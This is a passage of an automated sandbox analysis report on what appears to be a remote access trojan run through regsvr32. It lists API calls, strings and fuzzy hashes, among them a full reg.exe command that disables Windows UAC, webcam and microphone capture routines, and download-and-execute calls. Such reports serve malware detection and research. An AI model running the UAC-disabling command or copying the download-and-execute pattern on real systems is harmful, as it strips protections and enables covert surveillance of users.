                                      • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02A0779B
                                      • CloseHandle.KERNEL32(?), ref: 02A077AA
                                      • CloseHandle.KERNEL32(?), ref: 02A077AF
                                      Strings
                                      • C:\Windows\System32\cmd.exe, xrefs: 02A07796
                                      • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 02A07791
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreateProcess
                                      • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                      • API String ID: 2922976086-4183131282
                                      • Opcode ID: 1eadb1d94b70d98f78b941e0cdcaa9d4121506c49fca2c746e6147646cb91d32
                                      • Instruction ID: adb7d7dee222d880f91d288eb941bc8d056bf43373b7c45bd5ef15562ba991b4
                                      • Opcode Fuzzy Hash: 1eadb1d94b70d98f78b941e0cdcaa9d4121506c49fca2c746e6147646cb91d32
                                      • Instruction Fuzzy Hash: 36F06272D402AC76DB20AAD69C0DEDF7F7DEBC5F11F00045AF504A6040DA705014CAB0
                                      Function 02A4333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,02A432EB,00000000,?,02A4328B,00000000,02A6E948,0000000C,02A433E2,00000000,00000002), ref: 02A4335A
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02A4336D
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,02A432EB,00000000,?,02A4328B,00000000,02A6E948,0000000C,02A433E2,00000000,00000002), ref: 02A43390
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: ef0b5bb356482f9ff1651a67fcc0a9a24649909dbb7b898b1964923f31258503
                                      • Instruction ID: 3722c52e21781b97aa05079da6a819ecd73092739da5d009a7e1d7c1c06bf15f
                                      • Opcode Fuzzy Hash: ef0b5bb356482f9ff1651a67fcc0a9a24649909dbb7b898b1964923f31258503
                                      • Instruction Fuzzy Hash: 2AF08C34A40229FBDF119FA0D848BAFBBB5EF44716F1045E8F80AA6250CF70DA51CA90
                                      Function 02A050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,02A74EF8,02A04E7A,00000001,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000), ref: 02A05120
                                      • SetEvent.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000), ref: 02A0512C
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000), ref: 02A05137
                                      • CloseHandle.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000), ref: 02A05140
                                        • Part of subcall function 02A1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02A1B509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                      • String ID: KeepAlive | Disabled
                                      • API String ID: 2993684571-305739064
                                      • Opcode ID: cd95f3787fda87c5c617d8ee591431992c595f013363cbfd3d551945abd29ed4
                                      • Instruction ID: 1f7ed195c115099623e5d8e77035857dbc503184ab7f35a3ce8f148400edbdc8
                                      • Opcode Fuzzy Hash: cd95f3787fda87c5c617d8ee591431992c595f013363cbfd3d551945abd29ed4
                                      • Instruction Fuzzy Hash: 3AF09071D84311BFEB203B749D4EA7FBF99BB02710F004959E88282690DE658C15CF92
                                      Function 02A1ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02A1B509
                                      • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 02A1ADF2
                                      • PlaySoundW.WINMM(00000000,00000000), ref: 02A1AE00
                                      • Sleep.KERNEL32(00002710), ref: 02A1AE07
                                      • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 02A1AE10
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: PlaySound$HandleLocalModuleSleepTime
                                      • String ID: Alarm triggered
                                      • API String ID: 614609389-2816303416
                                      • Opcode ID: 68ed11aebca30b6ccb1047753fb990c1c1812972157f87d63bbac4d6edfdd05a
                                      • Instruction ID: 899a1972d91dde81636bfbbf6b2edd50238f6807e91a878c3b84d42a8840063d
                                      • Opcode Fuzzy Hash: 68ed11aebca30b6ccb1047753fb990c1c1812972157f87d63bbac4d6edfdd05a
                                      • Instruction Fuzzy Hash: BCE01226EC0261776620377A6D4FD7F7E29DAD2B607010469F9065A144DE440C16CAF2
                                      Function 02A1CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,02A1CDED), ref: 02A1CD62
                                      • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,02A1CDED), ref: 02A1CD6F
                                      • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,02A1CDED), ref: 02A1CD7C
                                      • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,02A1CDED), ref: 02A1CD8F
                                      Strings
                                      • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 02A1CD82
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Console$AttributeText$BufferHandleInfoScreen
                                      • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                      • API String ID: 3024135584-2418719853
                                      • Opcode ID: a8874afee890df0ae664a1f5e03282a0b7d4df01981258976cbab406ce48099c
                                      • Instruction ID: 7998b48ad31a927aa11b039c908a0d9cb8ea575f309337bd212c1df23a2c9ee4
                                      • Opcode Fuzzy Hash: a8874afee890df0ae664a1f5e03282a0b7d4df01981258976cbab406ce48099c
                                      • Instruction Fuzzy Hash: 86E09232980325E7E21027B5AC4DCAB7B6CF748722B000645FA1284082AE24841586F0
                                      Function 02A1B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 02A1B4B9
                                      • LoadResource.KERNEL32(00000000,?,?,02A0F3DE,00000000), ref: 02A1B4CD
                                      • LockResource.KERNEL32(00000000,?,?,02A0F3DE,00000000), ref: 02A1B4D4
                                      • SizeofResource.KERNEL32(00000000,?,?,02A0F3DE,00000000), ref: 02A1B4E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Resource$FindLoadLockSizeof
                                      • String ID: SETTINGS
                                      • API String ID: 3473537107-594951305
                                      • Opcode ID: af4359f8f59fe47e7d20c8fe2001293a85122292dab2f1a839757f72489d8172
                                      • Instruction ID: 9e8907421cf539f6f95abfc5013afe87a6c38e81361b664f7df3e58f87e43a36
                                      • Opcode Fuzzy Hash: af4359f8f59fe47e7d20c8fe2001293a85122292dab2f1a839757f72489d8172
                                      • Instruction Fuzzy Hash: 6DE01235A80331FBDB211B65AC4CD473F29F7C57667000855F9019A211CF39C42ADAA4
                                      Function 02A4139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 475da59341925d819c5c24b76dfb580e4e13fad828995188aafbbf143d6661ff
                                      • Instruction ID: 58e0d13c08ae7b9ee7545343f5b9a5487ab435bc85be1282f48435559b555946
                                      • Opcode Fuzzy Hash: 475da59341925d819c5c24b76dfb580e4e13fad828995188aafbbf143d6661ff
                                      • Instruction Fuzzy Hash: BE718171A00216DBCB21CF55C884AFFBBB5EF85364F544669E42AA7180DF70D9C1CBA2
                                      Function 02A04371 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000000,?), ref: 02A044C4
                                        • Part of subcall function 02A04607: __EH_prolog.LIBCMT ref: 02A0460C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: H_prologSleep
                                      • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                      • API String ID: 3469354165-3547787478
                                      • Opcode ID: b9c3250047742795fd195e857c9c3a7cfdfff1e94548410fa7e2c5bda0cf64c5
                                      • Instruction ID: 40cd6170d49b8e12d66c16f401a5df2888267d3ee2a6b1093361d06ef278a6a8
                                      • Opcode Fuzzy Hash: b9c3250047742795fd195e857c9c3a7cfdfff1e94548410fa7e2c5bda0cf64c5
                                      • Instruction Fuzzy Hash: 7451F331B843106BDA14FB74BED8B6E3B67AB89750F400819E90A876D0DF319D19CF96
                                      Function 02A44CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A46137: RtlAllocateHeap.NTDLL(00000000,02A352BC,?,?,02A38847,?,?,00000000,02A76B50,?,02A0DE62,02A352BC,?,?,?,?), ref: 02A46169
                                      • _free.LIBCMT ref: 02A44E06
                                      • _free.LIBCMT ref: 02A44E1D
                                      • _free.LIBCMT ref: 02A44E3C
                                      • _free.LIBCMT ref: 02A44E57
                                      • _free.LIBCMT ref: 02A44E6E
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$AllocateHeap
                                      • String ID:
                                      • API String ID: 3033488037-0
                                      • Opcode ID: 903d19b1dc00355d37ce84b6aff4af6af35e2299aa16f5cda84cae4b7cd6e85f
                                      • Instruction ID: 295ebc42998bc0f22fca48a64d0c043aef793d9de47156a8534b853e533933ec
                                      • Opcode Fuzzy Hash: 903d19b1dc00355d37ce84b6aff4af6af35e2299aa16f5cda84cae4b7cd6e85f
                                      • Instruction Fuzzy Hash: 9951D271A40704AFDB21DF69C881BAB77F5EF89724B044659E819D7250EF31EA01CF80
                                      Function 02A0F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A1BFB7: GetCurrentProcess.KERNEL32(?,?,?,02A0DAAA,WinDir,00000000,00000000), ref: 02A1BFC8
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02A0F91B
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 02A0F93F
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 02A0F94E
                                      • CloseHandle.KERNEL32(00000000), ref: 02A0FB05
                                        • Part of subcall function 02A1BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,02A0F5F9,00000000,?,?,02A75338), ref: 02A1BFFA
                                        • Part of subcall function 02A1C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02A1C1F5
                                        • Part of subcall function 02A1C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02A1C208
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 02A0FAF6
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 4269425633-0
                                      • Opcode ID: c86336354261a35b83734b1d131ec0fab75fb29f629aa089c5b6e3c330cff6b3
                                      • Instruction ID: 5367318e0c06a64e0f5d19521a7599a6d60e427ccd53f259065bf9a8f4b7aa1e
                                      • Opcode Fuzzy Hash: c86336354261a35b83734b1d131ec0fab75fb29f629aa089c5b6e3c330cff6b3
                                      • Instruction Fuzzy Hash: 684114315483419BC325FB21E9D4AEFB3AAAF94354F504D1EE58E861D0EF305A0ACF52
                                      Function 02A43DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 7155d6843e2ed9cb6e5b81a8112529adfb5fbab7af049e474d456e7df7bc53ab
                                      • Instruction ID: 14d49470f456576d5be844d2895b577273aa92a163d1a09d540906b024b693a0
                                      • Opcode Fuzzy Hash: 7155d6843e2ed9cb6e5b81a8112529adfb5fbab7af049e474d456e7df7bc53ab
                                      • Instruction Fuzzy Hash: 01419E36A41200AFDB24DF78C981A5EB7F6EFC9714F2545A9E516EB241DF31E902CB80
                                      Function 02A5112C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,02A3F8C8,?,00000000,?,00000001,?,?,00000001,02A3F8C8,?), ref: 02A51179
                                      • __alloca_probe_16.LIBCMT ref: 02A511B1
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02A51202
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02A3AE84,?), ref: 02A51214
                                      • __freea.LIBCMT ref: 02A5121D
                                        • Part of subcall function 02A46137: RtlAllocateHeap.NTDLL(00000000,02A352BC,?,?,02A38847,?,?,00000000,02A76B50,?,02A0DE62,02A352BC,?,?,?,?), ref: 02A46169
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                      • String ID:
                                      • API String ID: 313313983-0
                                      • Opcode ID: 8c9be06d476d7a59310e52805242d50cc7a76a366117209c2c2bfe39f9d4e5a4
                                      • Instruction ID: 6ee0961616e0d56674ba05df5795ed2b0c8b32cba522393b0872425d05193a63
                                      • Opcode Fuzzy Hash: 8c9be06d476d7a59310e52805242d50cc7a76a366117209c2c2bfe39f9d4e5a4
                                      • Instruction Fuzzy Hash: 4131B371A4022A9BDF25DF64DC80EBFBBA5EB40714F044568FC08DB190EB35C955CB90
                                      Function 02A01BE9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 02A01BF9
                                      • waveInOpen.WINMM(02A72AC0,000000FF,02A72AA8,Function_00001D0B,00000000,00000000,00000024), ref: 02A01C8F
                                      • waveInPrepareHeader.WINMM(02A72A88,00000020), ref: 02A01CE3
                                      • waveInAddBuffer.WINMM(02A72A88,00000020), ref: 02A01CF2
                                      • waveInStart.WINMM ref: 02A01CFE
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                      • String ID:
                                      • API String ID: 1356121797-0
                                      • Opcode ID: bf02913a7fd28fead01e46f0874666c08cea984e7266b361c2322497222cf81e
                                      • Instruction ID: baa8dd0acf3fc8e3e2d8723f4accfde165049fcd5ba495f09488dfbca1d45265
                                      • Opcode Fuzzy Hash: bf02913a7fd28fead01e46f0874666c08cea984e7266b361c2322497222cf81e
                                      • Instruction Fuzzy Hash: 67215A72EC42019FF7259F65FC04B5B7BB6FB94710B00082AA90AC6690DF34846ACB5C
                                      Function 02A4F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 02A4F363
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02A4F386
                                        • Part of subcall function 02A46137: RtlAllocateHeap.NTDLL(00000000,02A352BC,?,?,02A38847,?,?,00000000,02A76B50,?,02A0DE62,02A352BC,?,?,?,?), ref: 02A46169
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02A4F3AC
                                      • _free.LIBCMT ref: 02A4F3BF
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 02A4F3CE
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: 1df56cd4992bead125fa5d6cce24ace7a967296636bb250138403dd346d65b20
                                      • Instruction ID: 7dcc863570725be2e42309c370157bb35e341faaedb0fca54fa59364cc41dcdc
                                      • Opcode Fuzzy Hash: 1df56cd4992bead125fa5d6cce24ace7a967296636bb250138403dd346d65b20
                                      • Instruction Fuzzy Hash: E101D473A01365BF27211ABA5C8CC7B6A6DDAC6EAD31511ADFD24C7600DF68DD0285F0
                                      Function 02A1C3F1 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,02A1C510,00000000,00000000,00000000), ref: 02A1C430
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,02A1C510,00000000,00000000), ref: 02A1C44D
                                      • CloseHandle.KERNEL32(00000000,?,00000004,00000000,02A1C510,00000000,00000000), ref: 02A1C459
                                      • WriteFile.KERNEL32(00000000,00000000,00000000,02A06F85,00000000,?,00000004,00000000,02A1C510,00000000,00000000), ref: 02A1C46A
                                      • CloseHandle.KERNEL32(00000000,?,00000004,00000000,02A1C510,00000000,00000000), ref: 02A1C477
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreatePointerWrite
                                      • String ID:
                                      • API String ID: 1852769593-0
                                      • Opcode ID: 15c1627b26ddfb032e5d188203a53fe8f313d1b645d3138f43eb120c5ed380ae
                                      • Instruction ID: 0959e3061482bb99ced8495fc932048be66c8d43598c5cb25966bdae3b9a8abd
                                      • Opcode Fuzzy Hash: 15c1627b26ddfb032e5d188203a53fe8f313d1b645d3138f43eb120c5ed380ae
                                      • Instruction Fuzzy Hash: B711A971288225BFE6144B64AC8EE7B739DEB46774F00462AF592C71C0DF219C058672
                                      Function 02A11163 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02A11170
                                      • int.LIBCPMT ref: 02A11183
                                        • Part of subcall function 02A0E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 02A0E0D2
                                        • Part of subcall function 02A0E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 02A0E0EC
                                      • std::_Facet_Register.LIBCPMT ref: 02A111C3
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02A111CC
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02A111EA
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                      • String ID:
                                      • API String ID: 2536120697-0
                                      • Opcode ID: a4725d8a338da820dce356096dc07ecd92d017ef0bfe99d914571afcbc58732f
                                      • Instruction ID: 4486c0cdfde61c332b3fd2cf7e3240a4a923f04221799b2a76a5322f451383a0
                                      • Opcode Fuzzy Hash: a4725d8a338da820dce356096dc07ecd92d017ef0bfe99d914571afcbc58732f
                                      • Instruction Fuzzy Hash: BB11E732A40118ABCB15BBA8EA4499EFBBEDF40760B10055AE905A7290EF309E45CFD0
                                      Function 02A48299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,00000000,?,02A3BC87,00000000,?,?,02A3BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 02A4829E
                                      • _free.LIBCMT ref: 02A482D3
                                      • _free.LIBCMT ref: 02A482FA
                                      • SetLastError.KERNEL32(00000000), ref: 02A48307
                                      • SetLastError.KERNEL32(00000000), ref: 02A48310
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: ea3f19ab7d1b3763d9d7c5283b1f2eb2d40483173db919813752dc001e7f772b
                                      • Instruction ID: 63d484f621e65b03d057e260e6fbe9daf2c4413e2ce810f70cb3054fa648a190
                                      • Opcode Fuzzy Hash: ea3f19ab7d1b3763d9d7c5283b1f2eb2d40483173db919813752dc001e7f772b
                                      • Instruction Fuzzy Hash: 3801F936980700AF831126257DC4E6B266FEBC27757240929FC2996184EF6CCC0685A4
                                      Function 02A509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 02A509D4
                                        • Part of subcall function 02A46782: HeapFree.KERNEL32(00000000,00000000,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?), ref: 02A46798
                                        • Part of subcall function 02A46782: GetLastError.KERNEL32(?,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?,?), ref: 02A467AA
                                      • _free.LIBCMT ref: 02A509E6
                                      • _free.LIBCMT ref: 02A509F8
                                      • _free.LIBCMT ref: 02A50A0A
                                      • _free.LIBCMT ref: 02A50A1C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 27fa79e8ca64a88a31b3a0c63e2d059a0e1b3b962df6610202e298bd8ca6daef
                                      • Instruction ID: e9c4e39460b7412b3223ec9aaacc3b84d31d818b35638bc6f1d9ebb4c32ce526
                                      • Opcode Fuzzy Hash: 27fa79e8ca64a88a31b3a0c63e2d059a0e1b3b962df6610202e298bd8ca6daef
                                      • Instruction Fuzzy Hash: C5F01232984210FB8620EF58E9C1C1B73DEEA55B167588D0DF56DDB500DF30FC958A94
                                      Function 02A44048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 02A44066
                                        • Part of subcall function 02A46782: HeapFree.KERNEL32(00000000,00000000,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?), ref: 02A46798
                                        • Part of subcall function 02A46782: GetLastError.KERNEL32(?,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?,?), ref: 02A467AA
                                      • _free.LIBCMT ref: 02A44078
                                      • _free.LIBCMT ref: 02A4408B
                                      • _free.LIBCMT ref: 02A4409C
                                      • _free.LIBCMT ref: 02A440AD
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: eb1561ad6dbf531a4dec8638e88ccc642e26c6a3cdfb091250d77092f4a5ebc4
                                      • Instruction ID: 503d93d99fbfd541eaf496d7923be7106836a90987eaf91c068cf77907ed160b
                                      • Opcode Fuzzy Hash: eb1561ad6dbf531a4dec8638e88ccc642e26c6a3cdfb091250d77092f4a5ebc4
                                      • Instruction Fuzzy Hash: CDF0D071C81110DFA621AF28BC80A0677A6E745B613494916F92456660CF35CE7BCFCA
                                      Function 02A06EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 02A06FBC
                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 02A070A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DownloadExecuteFileShell
